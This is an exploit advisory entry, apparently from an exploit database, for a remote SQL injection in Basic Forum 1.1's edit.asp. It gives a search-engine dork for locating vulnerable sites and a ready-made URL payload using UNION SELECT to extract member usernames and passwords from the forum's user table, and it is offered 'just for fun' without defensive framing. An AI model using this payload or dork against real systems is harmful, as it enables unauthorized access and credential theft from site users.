id: 1210
date: 11/25/2006
title: Basic Forum <= 1.1 (edit.asp) Remote SQL Injection Vulnerability
author: bolivar
cves: 

================================================================
Basic Forum <= 1.1 (edit.asp) Remote SQL Injection Vulnerability
================================================================



# Title   :  basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "This script created by www.script.canavari.com"

---------------------------------------------------------------------------

http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler

---------------------------------------------------------------------------
# Just for Fun!!



#  0day.today [2023-03-26]  #